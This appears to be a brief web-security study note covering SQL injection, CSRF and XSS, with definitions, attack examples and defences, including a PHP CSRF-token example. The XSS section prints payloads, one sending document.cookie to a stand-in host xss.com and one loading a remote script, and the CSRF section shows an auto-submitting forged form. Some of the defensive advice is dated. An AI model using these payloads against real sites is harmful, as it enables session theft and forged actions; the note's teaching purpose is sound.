iptables -A INPUT -s xxx.xxx.xxx.xxx -j DROP
iptables-save   # "iptables save" is not a command; iptables-save prints the active rules, redirect its output to your distribution's persistent rules file to keep them across reboots
Category: Security
SQL Injection
Definition: http://en.wikipedia.org/wiki/SQL_injection
Protection: Filtering & Escaping
$name = $_POST['name'];
// Filter: accept letters only, otherwise stop
if (!ctype_alpha($name)) exit;
// Escape: neutralise quote characters before embedding the value in SQL
// (mysql_real_escape_string() belongs to the legacy mysql extension, removed in PHP 7)
$name = mysql_real_escape_string($name);
$query = "SELECT * FROM users WHERE name = '{$name}'";
Cross-Site Request Forgeries (CSRF)
Definition: http://en.wikipedia.org/wiki/Cross-site_request_forgery
Example:
<img src="http://csrf.com/logout?confirm=true">
<body onload="$('form').submit()">
<form action="http://csrf.com/" method="post">
<input name="confirm" value="true" />
</form>
</body>
Protection:
– Check the Referer header and reject requests that do not originate from your own site
– Insert a token into the form, and store the token and token_time in the session so the submission can be verified and expired tokens rejected
– Insert the cookie value into the form via JavaScript (cross-origin XmlHttpRequest calls cannot read your cookies, so a forged request cannot supply it)
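The token approach from the list above, as an added example that is not part of the original notes: the token and its creation time are kept in the session, embedded in the form, and verified with a constant-time comparison on POST. The form action `/confirm`, the 30-minute lifetime and PHP 7 (for random_bytes) are assumptions.

```php
<?php
// Added example: CSRF token with token_time stored in the session.
// Assumes PHP 7+ (random_bytes, hash_equals) and a session cookie already in use.
session_start();

const CSRF_TOKEN_TTL = 1800; // assumed lifetime in seconds

function csrf_token(): string
{
    // Issue a fresh token when none exists or the current one has expired
    if (empty($_SESSION['token']) || empty($_SESSION['token_time'])
        || time() - $_SESSION['token_time'] > CSRF_TOKEN_TTL) {
        $_SESSION['token']      = bin2hex(random_bytes(32));
        $_SESSION['token_time'] = time();
    }
    return $_SESSION['token'];
}

function csrf_check(array $post): bool
{
    if (empty($_SESSION['token']) || empty($_SESSION['token_time']) || empty($post['token'])) {
        return false;
    }
    // Reject expired tokens, then compare in constant time to avoid timing leaks
    if (time() - $_SESSION['token_time'] > CSRF_TOKEN_TTL) {
        return false;
    }
    return hash_equals($_SESSION['token'], (string) $post['token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or expired CSRF token');
    }
    // ... perform the state-changing action (e.g. the "confirm") here ...
    // Rotate the token after a successful use so it cannot be replayed
    unset($_SESSION['token'], $_SESSION['token_time']);
}
?>
<!-- /confirm is a placeholder action; the token is HTML-escaped before output -->
<form action="/confirm" method="post">
    <input type="hidden" name="token"
           value="<?php echo htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8'); ?>" />
    <input name="confirm" value="true" />
    <input type="submit" value="Confirm" />
</form>
```

The auto-submitting form from the example above fails this check because the attacker's page cannot read the token out of the victim's session.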
Cross Site Scripting (XSS)
Definition: http://en.wikipedia.org/wiki/Cross-site_scripting
XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc
XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.
Example:
<?php echo $_POST['name']; ?>
Examples of XSS exploits:
<script>alert('xss')</script>
<script>new Image().src='http://xss.com/xss.php?cookies='+encodeURI(document.cookie)</script>
<script src="http://xss.com/xss.js"></script>
Protection:
– Validate the input
– Escape the input / output, so that user-supplied text is rendered as text rather than interpreted as HTML
<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8'); ?>
– Bind the session cookie to the client's IP address, so a cookie presented from a different IP is rejected